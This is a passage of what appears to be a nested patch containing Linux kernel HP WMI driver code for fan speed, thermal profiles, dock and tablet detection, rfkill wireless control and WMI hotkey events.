+-	char fan_data[4] = { fan, 0, 0, 0 };
+-
+-	int ret = hp_wmi_perform_query(HPWMI_FAN_SPEED_GET_QUERY, HPWMI_GM,
+-				       &fan_data, sizeof(char),
+-				       sizeof(fan_data));
+-
+-	if (ret != 0)
+-		return -EINVAL;
+-
+-	fsh = fan_data[2];
+-	fsl = fan_data[3];
+-
+-	return (fsh << 8) | fsl;
+-}
+-
+-static int hp_wmi_read_int(int query)
+-{
+-	int val = 0, ret;
+-
+-	ret = hp_wmi_perform_query(query, HPWMI_READ, &val,
+-				   zero_if_sup(val), sizeof(val));
+-
+-	if (ret)
+-		return ret < 0 ? ret : -EINVAL;
+-
+-	return val;
+-}
+-
+-static int hp_wmi_get_dock_state(void)
+-{
+-	int state = hp_wmi_read_int(HPWMI_HARDWARE_QUERY);
+-
+-	if (state < 0)
+-		return state;
+-
+-	return !!(state & HPWMI_DOCK_MASK);
+-}
+-
+-static int hp_wmi_get_tablet_mode(void)
+-{
+-	char system_device_mode[4] = { 0 };
+-	const char *chassis_type;
+-	bool tablet_found;
+-	int ret;
+-
+-	chassis_type = dmi_get_system_info(DMI_CHASSIS_TYPE);
+-	if (!chassis_type)
+-		return -ENODEV;
+-
+-	tablet_found = match_string(tablet_chassis_types,
+-				    ARRAY_SIZE(tablet_chassis_types),
+-				    chassis_type) >= 0;
+-	if (!tablet_found)
+-		return -ENODEV;
+-
+-	ret = hp_wmi_perform_query(HPWMI_SYSTEM_DEVICE_MODE, HPWMI_READ,
+-				   system_device_mode, zero_if_sup(system_device_mode),
+-				   sizeof(system_device_mode));
+-	if (ret < 0)
+-		return ret;
+-
+-	return system_device_mode[0] == DEVICE_MODE_TABLET;
+-}
+-
+-static int omen_thermal_profile_set(int mode)
+-{
+-	char buffer[2] = {0, mode};
+-	int ret;
+-
+-	ret = hp_wmi_perform_query(HPWMI_SET_PERFORMANCE_MODE, HPWMI_GM,
+-				   &buffer, sizeof(buffer), 0);
+-
+-	if (ret)
+-		return ret < 0 ? ret : -EINVAL;
+-
+-	return mode;
+-}
+-
+-static bool is_omen_thermal_profile(void)
+-{
+-	const char *board_name = dmi_get_system_info(DMI_BOARD_NAME);
+-
+-	if (!board_name)
+-		return false;
+-
+-	return match_string(omen_thermal_profile_boards,
+-			    ARRAY_SIZE(omen_thermal_profile_boards),
+-			    board_name) >= 0;
+-}
+-
+-static int omen_get_thermal_policy_version(void)
+-{
+-	unsigned char buffer[8] = { 0 };
+-	int ret;
+-
+-	const char *board_name = dmi_get_system_info(DMI_BOARD_NAME);
+-
+-	if (board_name) {
+-		int matches = match_string(omen_thermal_profile_force_v0_boards,
+-			ARRAY_SIZE(omen_thermal_profile_force_v0_boards),
+-			board_name);
+-		if (matches >= 0)
+-			return 0;
+-	}
+-
+-	ret = hp_wmi_perform_query(HPWMI_GET_SYSTEM_DESIGN_DATA, HPWMI_GM,
+-				   &buffer, sizeof(buffer), sizeof(buffer));
+-
+-	if (ret)
+-		return ret < 0 ? ret : -EINVAL;
+-
+-	return buffer[3];
+-}
+-
+-static int omen_thermal_profile_get(void)
+-{
+-	u8 data;
+-
+-	int ret = ec_read(HP_OMEN_EC_THERMAL_PROFILE_OFFSET, &data);
+-
+-	if (ret)
+-		return ret;
+-
+-	return data;
+-}
+-
+-static int hp_wmi_fan_speed_max_set(int enabled)
+-{
+-	int ret;
+-
+-	ret = hp_wmi_perform_query(HPWMI_FAN_SPEED_MAX_SET_QUERY, HPWMI_GM,
+-				   &enabled, sizeof(enabled), 0);
+-
+-	if (ret)
+-		return ret < 0 ? ret : -EINVAL;
+-
+-	return enabled;
+-}
+-
+-static int hp_wmi_fan_speed_max_get(void)
+-{
+-	int val = 0, ret;
+-
+-	ret = hp_wmi_perform_query(HPWMI_FAN_SPEED_MAX_GET_QUERY, HPWMI_GM,
+-				   &val, zero_if_sup(val), sizeof(val));
+-
+-	if (ret)
+-		return ret < 0 ? ret : -EINVAL;
+-
+-	return val;
+-}
+-
+-static int __init hp_wmi_bios_2008_later(void)
+-{
+-	int state = 0;
+-	int ret = hp_wmi_perform_query(HPWMI_FEATURE_QUERY, HPWMI_READ, &state,
+-				       zero_if_sup(state), sizeof(state));
+-	if (!ret)
+-		return 1;
+-
+-	return (ret == HPWMI_RET_UNKNOWN_CMDTYPE) ? 0 : -ENXIO;
+-}
+-
+-static int __init hp_wmi_bios_2009_later(void)
+-{
+-	u8 state[128];
+-	int ret = hp_wmi_perform_query(HPWMI_FEATURE2_QUERY, HPWMI_READ, &state,
+-				       zero_if_sup(state), sizeof(state));
+-	if (!ret)
+-		return 1;
+-
+-	return (ret == HPWMI_RET_UNKNOWN_CMDTYPE) ? 0 : -ENXIO;
+-}
+-
+-static int __init hp_wmi_enable_hotkeys(void)
+-{
+-	int value = 0x6e;
+-	int ret = hp_wmi_perform_query(HPWMI_BIOS_QUERY, HPWMI_WRITE, &value,
+-				       sizeof(value), 0);
+-
+-	return ret <= 0 ? ret : -EINVAL;
+-}
+-
+-static int hp_wmi_set_block(void *data, bool blocked)
+-{
+-	enum hp_wmi_radio r = (enum hp_wmi_radio) data;
+-	int query = BIT(r + 8) | ((!blocked) << r);
+-	int ret;
+-
+-	ret = hp_wmi_perform_query(HPWMI_WIRELESS_QUERY, HPWMI_WRITE,
+-				   &query, sizeof(query), 0);
+-
+-	return ret <= 0 ? ret : -EINVAL;
+-}
+-
+-static const struct rfkill_ops hp_wmi_rfkill_ops = {
+-	.set_block = hp_wmi_set_block,
+-};
+-
+-static bool hp_wmi_get_sw_state(enum hp_wmi_radio r)
+-{
+-	int mask = 0x200 << (r * 8);
+-
+-	int wireless = hp_wmi_read_int(HPWMI_WIRELESS_QUERY);
+-
+-	/* TBD: Pass error */
+-	WARN_ONCE(wireless < 0, "error executing HPWMI_WIRELESS_QUERY");
+-
+-	return !(wireless & mask);
+-}
+-
+-static bool hp_wmi_get_hw_state(enum hp_wmi_radio r)
+-{
+-	int mask = 0x800 << (r * 8);
+-
+-	int wireless = hp_wmi_read_int(HPWMI_WIRELESS_QUERY);
+-
+-	/* TBD: Pass error */
+-	WARN_ONCE(wireless < 0, "error executing HPWMI_WIRELESS_QUERY");
+-
+-	return !(wireless & mask);
+-}
+-
+-static int hp_wmi_rfkill2_set_block(void *data, bool blocked)
+-{
+-	int rfkill_id = (int)(long)data;
+-	char buffer[4] = { 0x01, 0x00, rfkill_id, !blocked };
+-	int ret;
+-
+-	ret = hp_wmi_perform_query(HPWMI_WIRELESS2_QUERY, HPWMI_WRITE,
+-				   buffer, sizeof(buffer), 0);
+-
+-	return ret <= 0 ? ret : -EINVAL;
+-}
+-
+-static const struct rfkill_ops hp_wmi_rfkill2_ops = {
+-	.set_block = hp_wmi_rfkill2_set_block,
+-};
+-
+-static int hp_wmi_rfkill2_refresh(void)
+-{
+-	struct bios_rfkill2_state state;
+-	int err, i;
+-
+-	err = hp_wmi_perform_query(HPWMI_WIRELESS2_QUERY, HPWMI_READ, &state,
+-				   zero_if_sup(state), sizeof(state));
+-	if (err)
+-		return err;
+-
+-	for (i = 0; i < rfkill2_count; i++) {
+-		int num = rfkill2[i].num;
+-		struct bios_rfkill2_device_state *devstate;
+-
+-		devstate = &state.device[num];
+-
+-		if (num >= state.count ||
+-		    devstate->rfkill_id != rfkill2[i].id) {
+-			pr_warn("power configuration of the wireless devices unexpectedly changed\n");
+-			continue;
+-		}
+-
+-		rfkill_set_states(rfkill2[i].rfkill,
+-				  IS_SWBLOCKED(devstate->power),
+-				  IS_HWBLOCKED(devstate->power));
+-	}
+-
+-	return 0;
+-}
+-
+-static ssize_t display_show(struct device *dev, struct device_attribute *attr,
+-			    char *buf)
+-{
+-	int value = hp_wmi_read_int(HPWMI_DISPLAY_QUERY);
+-
+-	if (value < 0)
+-		return value;
+-	return sprintf(buf, "%d\n", value);
+-}
+-
+-static ssize_t hddtemp_show(struct device *dev, struct device_attribute *attr,
+-			    char *buf)
+-{
+-	int value = hp_wmi_read_int(HPWMI_HDDTEMP_QUERY);
+-
+-	if (value < 0)
+-		return value;
+-	return sprintf(buf, "%d\n", value);
+-}
+-
+-static ssize_t als_show(struct device *dev, struct device_attribute *attr,
+-			char *buf)
+-{
+-	int value = hp_wmi_read_int(HPWMI_ALS_QUERY);
+-
+-	if (value < 0)
+-		return value;
+-	return sprintf(buf, "%d\n", value);
+-}
+-
+-static ssize_t dock_show(struct device *dev, struct device_attribute *attr,
+-			 char *buf)
+-{
+-	int value = hp_wmi_get_dock_state();
+-
+-	if (value < 0)
+-		return value;
+-	return sprintf(buf, "%d\n", value);
+-}
+-
+-static ssize_t tablet_show(struct device *dev, struct device_attribute *attr,
+-			   char *buf)
+-{
+-	int value = hp_wmi_get_tablet_mode();
+-
+-	if (value < 0)
+-		return value;
+-	return sprintf(buf, "%d\n", value);
+-}
+-
+-static ssize_t postcode_show(struct device *dev, struct device_attribute *attr,
+-			     char *buf)
+-{
+-	/* Get the POST error code of previous boot failure. */
+-	int value = hp_wmi_read_int(HPWMI_POSTCODEERROR_QUERY);
+-
+-	if (value < 0)
+-		return value;
+-	return sprintf(buf, "0x%x\n", value);
+-}
+-
+-static ssize_t als_store(struct device *dev, struct device_attribute *attr,
+-			 const char *buf, size_t count)
+-{
+-	u32 tmp;
+-	int ret;
+-
+-	ret = kstrtou32(buf, 10, &tmp);
+-	if (ret)
+-		return ret;
+-
+-	ret = hp_wmi_perform_query(HPWMI_ALS_QUERY, HPWMI_WRITE, &tmp,
+-				       sizeof(tmp), 0);
+-	if (ret)
+-		return ret < 0 ? ret : -EINVAL;
+-
+-	return count;
+-}
+-
+-static ssize_t postcode_store(struct device *dev, struct device_attribute *attr,
+-			      const char *buf, size_t count)
+-{
+-	u32 tmp = 1;
+-	bool clear;
+-	int ret;
+-
+-	ret = kstrtobool(buf, &clear);
+-	if (ret)
+-		return ret;
+-
+-	if (clear == false)
+-		return -EINVAL;
+-
+-	/* Clear the POST error code. It is kept until cleared. */
+-	ret = hp_wmi_perform_query(HPWMI_POSTCODEERROR_QUERY, HPWMI_WRITE, &tmp,
+-				       sizeof(tmp), 0);
+-	if (ret)
+-		return ret < 0 ? ret : -EINVAL;
+-
+-	return count;
+-}
+-
+-static DEVICE_ATTR_RO(display);
+-static DEVICE_ATTR_RO(hddtemp);
+-static DEVICE_ATTR_RW(als);
+-static DEVICE_ATTR_RO(dock);
+-static DEVICE_ATTR_RO(tablet);
+-static DEVICE_ATTR_RW(postcode);
+-
+-static struct attribute *hp_wmi_attrs[] = {
+-	&dev_attr_display.attr,
+-	&dev_attr_hddtemp.attr,
+-	&dev_attr_als.attr,
+-	&dev_attr_dock.attr,
+-	&dev_attr_tablet.attr,
+-	&dev_attr_postcode.attr,
+-	NULL,
+-};
+-ATTRIBUTE_GROUPS(hp_wmi);
+-
+-static void hp_wmi_notify(u32 value, void *context)
+-{
+-	struct acpi_buffer response = { ACPI_ALLOCATE_BUFFER, NULL };
+-	u32 event_id, event_data;
+-	union acpi_object *obj;
+-	acpi_status status;
+-	u32 *location;
+-	int key_code;
+-
+-	status = wmi_get_event_data(value, &response);
+-	if (status != AE_OK) {
+-		pr_info("bad event status 0x%x\n", status);
+-		return;
+-	}
+-
+-	obj = (union acpi_object *)response.pointer;
+-
+-	if (!obj)
+-		return;
+-	if (obj->type != ACPI_TYPE_BUFFER) {
+-		pr_info("Unknown response received %d\n", obj->type);
+-		kfree(obj);
+-		return;
+-	}
+-
+-	/*
+-	 * Depending on ACPI version the concatenation of id and event data
+-	 * inside the _WED function will result in an 8 or 16 byte buffer.
+-	 */
+-	location = (u32 *)obj->buffer.pointer;
+-	if (obj->buffer.length == 8) {
+-		event_id = *location;
+-		event_data = *(location + 1);
+-	} else if (obj->buffer.length == 16) {
+-		event_id = *location;
+-		event_data = *(location + 2);
+-	} else {
+-		pr_info("Unknown buffer length %d\n", obj->buffer.length);
+-		kfree(obj);
+-		return;
+-	}
+-	kfree(obj);
+-
+-	switch (event_id) {
+-	case HPWMI_DOCK_EVENT:
+-		if (test_bit(SW_DOCK, hp_wmi_input_dev->swbit))
+-			input_report_switch(hp_wmi_input_dev, SW_DOCK,
+-					    hp_wmi_get_dock_state());
+-		if (test_bit(SW_TABLET_MODE, hp_wmi_input_dev->swbit))
+-			input_report_switch(hp_wmi_input_dev, SW_TABLET_MODE,
+-					    hp_wmi_get_tablet_mode());
+-		input_sync(hp_wmi_input_dev);
+-		break;
+-	case HPWMI_PARK_HDD:
+-		break;
+-	case HPWMI_SMART_ADAPTER:
+-		break;
+-	case HPWMI_BEZEL_BUTTON:
+-	case HPWMI_OMEN_KEY:
+-		key_code = hp_wmi_read_int(HPWMI_HOTKEY_QUERY);
+-		if (key_code < 0)
+-			break;
+-
+-		if (!sparse_keymap_report_event(hp_wmi_input_dev,
+-						key_code, 1, true))
+-			pr_info("Unknown key code - 0x%x\n", key_code);
+-		break;
+-	case HPWMI_WIRELESS:
+-		if (rfkill2_count) {
+-			hp_wmi_rfkill2_refresh();
+-			break;
+-		}
+-
+-		if (wifi_rfkill)
+-			rfkill_set_states(wifi_rfkill,
+-					  hp_wmi_get_sw_state(HPWMI_WIFI),
+-					  hp_wmi_get_hw_state(HPWMI_WIFI));
+-		if (bluetooth_rfkill)
+-			rfkill_set_states(bluetooth_rfkill,
+-					  hp_wmi_get_sw_state(HPWMI_BLUETOOTH),
+-					  hp_wmi_get_hw_state(HPWMI_BLUETOOTH));
+-		if (wwan_rfkill)
+-			rfkill_set_states(wwan_rfkill,
+-					  hp_wmi_get_sw_state(HPWMI_WWAN),
+-					  hp_wmi_get_hw_state(HPWMI_WWAN));
+-		break;
+-	case HPWMI_CPU_BATTERY_THROTTLE:
+-		pr_info("Unimplemented CPU throttle because of 3 Cell battery event detected\n");
+-		break;
+-	case HPWMI_LOCK_SWITCH:
+-		break;
+-	case HPWMI_LID_SWITCH:
+-		break;
+-	case HPWMI_SCREEN_ROTATION:
+-		break;
+-	case HPWMI_COOLSENSE_SYSTEM_MOBILE:
+-		break;
+-	case HPWMI_COOLSENSE_SYSTEM_HOT:
+-		break;
+-	case HPWMI_PROXIMITY_SENSOR:
+-		break;
+-	case HPWMI_BACKLIT_KB_BRIGHTNESS:
+-		break;
+-	case HPWMI_PEAKSHIFT_PERIOD:
+-		break;
+-	case HPWMI_BATTERY_CHARGE_PERIOD:
+-		break;
+-	case HPWMI_SANITIZATION_MODE:
+-		break;
+-	case HPWMI_SMART_EXPERIENCE_APP:
+-		break;
+-	default:
+-		pr_info("Unknown event_id - %d - 0x%x\n", event_id, event_data);
+-		break;
+-	}
+-}
+-
+-static int __init hp_wmi_input_setup(void)
+-{
+-	acpi_status status;
+-	int err, val;
+-
+-	hp_wmi_input_dev = input_allocate_device();
+-	if (!hp_wmi_input_dev)
+-		return -ENOMEM;
+-
+-	hp_wmi_input_dev->name = "HP WMI hotkeys";
+-	hp_wmi_input_dev->phys = "wmi/input0";
+-	hp_wmi_input_dev->id.bustype = BUS_HOST;
+-
+-	__set_bit(EV_SW, hp_wmi_input_dev->evbit);
+-
+-	/* Dock */
+-	val = hp_wmi_get_dock_state();
+-	if (!(val < 0)) {
+-		__set_bit(SW_DOCK, hp_wmi_input_dev->swbit);
+-		input_report_switch(hp_wmi_input_dev, SW_DOCK, val);
+-	}
+-
+-	/* Tablet mode */
+-	val = hp_wmi_get_tablet_mode();
+-	if (!(val < 0)) {
+-		__set_bit(SW_TABLET_MODE, hp_wmi_input_dev->swbit);
+-		input_report_switch(hp_wmi_input_dev, SW_TABLET_MODE, val);
+-	}
+-
+-	err = sparse_keymap_setup(hp_wmi_input_dev, hp_wmi_keymap, NULL);
+-	if (err)
+-		goto err_free_dev;
+-
+-	/* Set initial hardware state */
+-	input_sync(hp_wmi_input_dev);
+-
+-	if (!hp_wmi_bios_2009_later() && hp_wmi_bios_2008_later())
+-		hp_wmi_enable_hotkeys();
+-
+-	status = wmi_install_notify_handler(HPWMI_EVENT_GUID, hp_wmi_notify, NULL);
+-	if (ACPI_FAILURE(status)) {
+-		err = -EIO;
+-		goto err_free_dev;
+-	}
+-
+-	err = input_register_device(hp_wmi_input_dev);
+-	if (err)
+-		goto err_uninstall_notifier;
+-
+-	return 0;
+-
+- err_uninstall_notifier:
+-	wmi_remove_notify_handler(HPWMI_EVENT_GUID);
+- err_free_dev:
+-	input_free_device(hp_wmi_input_dev);
+-	return err;
+-}
+-
+-static void hp_wmi_input_destroy(void)
+-{
+-	wmi_remove_notify_handler(HPWMI_EVENT_GUID);
+-	input_unregister_device(hp_wmi_input_dev);
+-}
+-
+-static int __init hp_wmi_rfkill_setup(struct platform_device *device)
+-{
+-	int err, wireless;
+-
+-	wireless = hp_wmi_read_int(HPWMI_WIRELESS_QUERY);
+-	if (wireless < 0)
+-		return wireless;
+-
+-	err = hp_wmi_perform_query(HPWMI_WIRELESS_QUERY, HPWMI_WRITE, &wireless,
+-				   sizeof(wireless), 0);
+-	if (err)
+-		return err;
+-
+-	if (wireless & 0x1) {
+-		wifi_rfkill = rfkill_alloc("hp-wifi", &device->dev,
+-					   RFKILL_TYPE_WLAN,
+-					   &hp_wmi_rfkill_ops,
+-					   (void *) HPWMI_WIFI);
+-		if (!wifi_rfkill)
+-			return -ENOMEM;
+-		rfkill_init_sw_state(wifi_rfkill,
+-				     hp_wmi_get_sw_state(HPWMI_WIFI));
+-		rfkill_set_hw_state(wifi_rfkill,
+-				    hp_wmi_get_hw_state(HPWMI_WIFI));
+-		err = rfkill_register(wifi_rfkill);
+-		if (err)
+-			goto register_wifi_error;
+-	}
+-
+-	if (wireless & 0x2) {
+-		bluetooth_rfkill = rfkill_alloc("hp-bluetooth", &device->dev,
+-						RFKILL_TYPE_BLUETOOTH,
+-						&hp_wmi_rfkill_ops,
+-						(void *) HPWMI_BLUETOOTH);
+-		if (!bluetooth_rfkill) {
+-			err = -ENOMEM;
+-			goto register_bluetooth_error;
+-		}
+-		rfkill_init_sw_state(bluetooth_rfkill,
+-				     hp_wmi_get_sw_state(HPWMI_BLUETOOTH));
+-		rfkill_set_hw_state(bluetooth_rfkill,
+-				    hp_wmi_get_hw_state(HPWMI_BLUETOOTH));
+-		err = rfkill_register(bluetooth_rfkill);
+-		if (err)
+-			goto register_bluetooth_error;
+-	}
+-
+-	if (wireless & 0x4) {
+-		wwan_rfkill = rfkill_alloc("hp-wwan", &device->dev,
+-					   RFKILL_TYPE_WWAN,
+-					   &hp_wmi_rfkill_ops,
+-					   (void *) HPWMI_WWAN);
+-		if (!wwan_rfkill) {
+-			err = -ENOMEM;
+-			goto register_wwan_error;
+-		}
+-		rfkill_init_sw_state(wwan_rfkill,
+-				     hp_wmi_get_sw_state(HPWMI_WWAN));
+-		rfkill_set_hw_state(wwan_rfkill,
+-				    hp_wmi_get_hw_state(HPWMI_WWAN));
+-		err = rfkill_register(wwan_rfkill);
+-		if (err)
+-			goto register_wwan_error;
+-	}
+-
+-	return 0;
+-
+-register_wwan_error:
+-	rfkill_destroy(wwan_rfkill);
+-	wwan_rfkill = NULL;
+-	if (bluetooth_rfkill)
+-		rfkill_unregister(bluetooth_rfkill);
+-register_bluetooth_error:
+-	rfkill_destroy(bluetooth_rfkill);
+-	bluetooth_rfkill = NULL;
+-	if (wifi_rfkill)
+-		rfkill_unregister(wifi_rfkill);
+-register_wifi_error:
+-	rfkill_destroy(wifi_rfkill);
+-	wifi_rfkill = NULL;
+-	return err;
+-}
+-
+-static int __init hp_wmi_rfkill2_setup(struct platform_device *device)
+-{
+-	struct bios_rfkill2_state state;
+-	int err, i;
+-
+-	err = hp_wmi_perform_query(HPWMI_WIRELESS2_QUERY, HPWMI_READ, &state,
+-				   zero_if_sup(state), sizeof(state));
+-	if (err)
+-		return err < 0 ? err : -EINVAL;
+-
+-	if (state.count > HPWMI_MAX_RFKILL2_DEVICES) {
+-		pr_warn("unable to parse 0x1b query output\n");
+-		return -EINVAL;
+-	}
+-
+-	for (i = 0; i < state.count; i++) {
+-		struct rfkill *rfkill;
+-		enum rfkill_type type;
+-		char *name;
+-
+-		switch (state.device[i].radio_type) {
+-		case HPWMI_WIFI:
+-			type = RFKILL_TYPE_WLAN;
+-			name = "hp-wifi";
+-			break;
+-		case HPWMI_BLUETOOTH:
+-			type = RFKILL_TYPE_BLUETOOTH;
+-			name = "hp-bluetooth";
+-			break;
+-		case HPWMI_WWAN:
+-			type = RFKILL_TYPE_WWAN;
+-			name = "hp-wwan";
+-			break;
+-		case HPWMI_GPS:
+-			type = RFKILL_TYPE_GPS;
+-			name = "hp-gps";
+-			break;
+-		default:
+-			pr_warn("unknown device type 0x%x\n",
+-				state.device[i].radio_type);
+-			continue;
+-		}
+-
+-		if (!state.device[i].vendor_id) {
+-			pr_warn("zero device %d while %d reported\n",
+-				i, state.count);
+-			continue;
+-		}
+-
+-		rfkill = rfkill_alloc(name, &device->dev, type,
+-				      &hp_wmi_rfkill2_ops, (void *)(long)i);
+-		if (!rfkill) {
+-			err = -ENOMEM;
+-			goto fail;
+-		}
+-
+-		rfkill2[rfkill2_count].id = state.device[i].rfkill_id;
+-		rfkill2[rfkill2_count].num = i;
+-		rfkill2[rfkill2_count].rfkill = rfkill;
+-
+-		rfkill_init_sw_state(rfkill,
+-				     IS_SWBLOCKED(state.device[i].power));
+-		rfkill_set_hw_state(rfkill,
+-				    IS_HWBLOCKED(state.device[i].power));
+-
+-		if (!(state.device[i].power & HPWMI_POWER_BIOS))
+-			pr_info("device %s blocked by BIOS\n", name);
+-
+-		err = rfkill_register(rfkill);
+-		if (err) {
+-			rfkill_destroy(rfkill);
+-			goto fail;
+-		}
+-
+-		rfkill2_count++;
+-	}
+-
+-	return 0;
+-fail:
+-	for (; rfkill2_count > 0; rfkill2_count--) {
+-		rfkill_unregister(rfkill2[rfkill2_count - 1].rfkill);
+-		rfkill_destroy(rfkill2[rfkill2_count - 1].rfkill);
+-	}
+-	return err;
+-}
+-
+-static int platform_profile_omen_get(struct platform_profile_handler *pprof,
+-				     enum platform_profile_option *profile)
+-{
+-	int tp;
+-
+-	tp = omen_thermal_profile_get();
+-	if (tp < 0)
+-		return tp;
+-
+-	switch (tp) {
+-	case HP_OMEN_V0_THERMAL_PROFILE_PERFORMANCE:
+-	case HP_OMEN_V1_THERMAL_PROFILE_PERFORMANCE:
+-		*profile = PLATFORM_PROFILE_PERFORMANCE;
+-		break;
+-	case HP_OMEN_V0_THERMAL_PROFILE_DEFAULT:
+-	case HP_OMEN_V1_THERMAL_PROFILE_DEFAULT:
+-		*profile = PLATFORM_PROFILE_BALANCED;
+-		break;
+-	case HP_OMEN_V0_THERMAL_PROFILE_COOL:
+-	case HP_OMEN_V1_THERMAL_PROFILE_COOL:
+-		*profile = PLATFORM_PROFILE_COOL;
+-		break;
+-	default:
+-		return -EINVAL;
+-	}
+-
+-	return 0;
+-}
+-
+-static int platform_profile_omen_set(struct platform_profile_handler *pprof,
+-				     enum platform_profile_option profile)
+-{
+-	int err, tp, tp_version;
+-
+-	tp_version = omen_get_thermal_policy_version();
+-
+-	if (tp_version < 0 || tp_version > 1)
+-		return -EOPNOTSUPP;
+-
+-	switch (profile) {
+-	case PLATFORM_PROFILE_PERFORMANCE:
+-		if (tp_version == 0)
+-			tp = HP_OMEN_V0_THERMAL_PROFILE_PERFORMANCE;
+-		else
+-			tp = HP_OMEN_V1_THERMAL_PROFILE_PERFORMANCE;
+-		break;
+-	case PLATFORM_PROFILE_BALANCED:
+-		if (tp_version == 0)
+-			tp = HP_OMEN_V0_THERMAL_PROFILE_DEFAULT;
+-		else
+-			tp = HP_OMEN_V1_THERMAL_PROFILE_DEFAULT;
+-		break;
+-	case PLATFORM_PROFILE_COOL:
+-		if (tp_version == 0)
+-			tp = HP_OMEN_V0_THERMAL_PROFILE_COOL;
+-		else
+-			tp = HP_OMEN_V1_THERMAL_PROFILE_COOL;
+-		break;
+-	default:
+-		return -EOPNOTSUPP;
+-	}
+-
+-	err = omen_thermal_profile_set(tp);
+-	if (err < 0)
+-		return err;
+-
+-	return 0;
+-}
+-
+-static int thermal_profile_get(void)
+-{
+-	return hp_wmi_read_int(HPWMI_THERMAL_PROFILE_QUERY);
+-}
+-
+-static int thermal_profile_set(int thermal_profile)
+-{
+-	return hp_wmi_perform_query(HPWMI_THERMAL_PROFILE_QUERY, HPWMI_WRITE, &thermal_profile,
+-							   sizeof(thermal_profile), 0);
+-}
+-
+-static int hp_wmi_platform_profile_get(struct platform_profile_handler *pprof,
+-					enum platform_profile_option *profile)
+-{
+-	int tp;
+-
+-	tp = thermal_profile_get();
+-	if (tp < 0)
+-		return tp;
+-
+-	switch (tp) {
+-	case HP_THERMAL_PROFILE_PERFORMANCE:
+-		*profile =  PLATFORM_PROFILE_PERFORMANCE;
+-		break;
+-	case HP_THERMAL_PROFILE_DEFAULT:
+-		*profile =  PLATFORM_PROFILE_BALANCED;
+-		break;
+-	case HP_THERMAL_PROFILE_COOL:
+-		*profile =  PLATFORM_PROFILE_COOL;
+-		break;
+-	case HP_THERMAL_PROFILE_QUIET:
+-		*profile = PLATFORM_PROFILE_QUIET;
+-		break;
+-	default:
+-		return -EINVAL;
+-	}
+-
+-	return 0;
+-}
+-
+-static int hp_wmi_platform_profile_set(struct platform_profile_handler *pprof,
+-					enum platform_profile_option profile)
+-{
+-	int err, tp;
+-
+-	switch (profile) {
+-	case PLATFORM_PROFILE_PERFORMANCE:
+-		tp =  HP_THERMAL_PROFILE_PERFORMANCE;
+-		break;
+-	case PLATFORM_PROFILE_BALANCED:
+-		tp =  HP_THERMAL_PROFILE_DEFAULT;
+-		break;
+-	case PLATFORM_PROFILE_COOL:
+-		tp =  HP_THERMAL_PROFILE_COOL;
+-		break;
+-	case PLATFORM_PROFILE_QUIET:
+-		tp = HP_THERMAL_PROFILE_QUIET;
+-		break;
+-	default:
+-		return -EOPNOTSUPP;
+-	}
+-
+-	err = thermal_profile_set(tp);
+-	if (err)
+-		return err;
+-
+-	return 0;
+-}
+-
+-static int thermal_profile_setup(void)
+-{
+-	int err, tp;
+-
+-	if (is_omen_thermal_profile()) {
+-		tp = omen_thermal_profile_get();
+-		if (tp < 0)
+-			return tp;
+-
+-		/*
+-		 * call thermal profile write command to ensure that the
+-		 * firmware correctly sets the OEM variables
+-		 */
+-
+-		err = omen_thermal_profile_set(tp);
+-		if (err < 0)
+-			return err;
+-
+-		platform_profile_handler.profile_get = platform_profile_omen_get;
+-		platform_profile_handler.profile_set = platform_profile_omen_set;
+-	} else {
+-		tp = thermal_profile_get();
+-
+-		if (tp < 0)
+-			return tp;
+-
+-		/*
+-		 * call thermal profile write command to ensure that the
+-		 * firmware correctly sets the OEM variables for the DPTF
+-		 */
+-		err = thermal_profile_set(tp);
+-		if (err)
+-			return err;
+-
+-		platform_profile_handler.profile_get = hp_wmi_platform_profile_get;
+-		platform_profile_handler.profile_set = hp_wmi_platform_profile_set;
+-
+-		set_bit(PLATFORM_PROFILE_QUIET, platform_profile_handler.choices);
+-	}
+-
+-	set_bit(PLATFORM_PROFILE_COOL, platform_profile_handler.choices);
+-	set_bit(PLATFORM_PROFILE_BALANCED, platform_profile_handler.choices);
+-	set_bit(PLATFORM_PROFILE_PERFORMANCE, platform_profile_handler.choices);
+-
+-	err = platform_profile_register(&platform_profile_handler);
+-	if (err)
+-		return err;
+-
+-	platform_profile_support = true;
+-
+-	return 0;
+-}
+-
+-static int hp_wmi_hwmon_init(void);
+-
+-static int __init hp_wmi_bios_setup(struct platform_device *device)
+-{
+-	int err;
+-	/* clear detected rfkill devices */
+-	wifi_rfkill = NULL;
+-	bluetooth_rfkill = NULL;
+-	wwan_rfkill = NULL;
+-	rfkill2_count = 0;
+-
+-	/*
+-	 * In pre-2009 BIOS, command 1Bh return 0x4 to indicate that
+-	 * BIOS no longer controls the power for the wireless
+-	 * devices. All features supported by this command will no
+-	 * longer be supported.
+-	 */
+-	if (!hp_wmi_bios_2009_later()) {
+-		if (hp_wmi_rfkill_setup(device))
+-			hp_wmi_rfkill2_setup(device);
+-	}
+-
+-	err = hp_wmi_hwmon_init();
+-
+-	if (err < 0)
+-		return err;
+-
+-	thermal_profile_setup();
+-
+-	return 0;
+-}
+-
+-static int __exit hp_wmi_bios_remove(struct platform_device *device)
+-{
+-	int i;
+-
+-	for (i = 0; i < rfkill2_count; i++) {
+-		rfkill_unregister(rfkill2[i].rfkill);
+-		rfkill_destroy(rfkill2[i].rfkill);
+-	}
+-
+-	if (wifi_rfkill) {
+-		rfkill_unregister(wifi_rfkill);
+-		rfkill_destroy(wifi_rfkill);
+-	}
+-	if (bluetooth_rfkill) {
+-		rfkill_unregister(bluetooth_rfkill);
+-		rfkill_destroy(bluetooth_rfkill);
+-	}
+-	if (wwan_rfkill) {
+-		rfkill_unregister(wwan_rfkill);
+-		rfkill_destroy(wwan_rfkill);
+-	}
+-
+-	if (platform_profile_support)
+-		platform_profile_remove();
+-
+-	return 0;
+-}
+-
+-static int hp_wmi_resume_handler(struct device *device)
+-{
+-	/*
+-	 * Hardware state may have changed while suspended, so trigger
+-	 * input events for the current state. As this is a switch,
+-	 * the input layer will only actually pass it on if the state
+-	 * changed.
+-	 */
+-	if (hp_wmi_input_dev) {
+-		if (test_bit(SW_DOCK, hp_wmi_input_dev->swbit))
+-			input_report_switch(hp_wmi_input_dev, SW_DOCK,
+-					    hp_wmi_get_dock_state());
+-		if (test_bit(SW_TABLET_MODE, hp_wmi_input_dev->swbit))
+-			input_report_switch(hp_wmi_input_dev, SW_TABLET_MODE,
+-					    hp_wmi_get_tablet_mode());
+-		input_sync(hp_wmi_input_dev);
+-	}
+-
+-	if (rfkill2_count)
+-		hp_wmi_rfkill2_refresh();
+-
+-	if (wifi_rfkill)
+-		rfkill_set_states(wifi_rfkill,
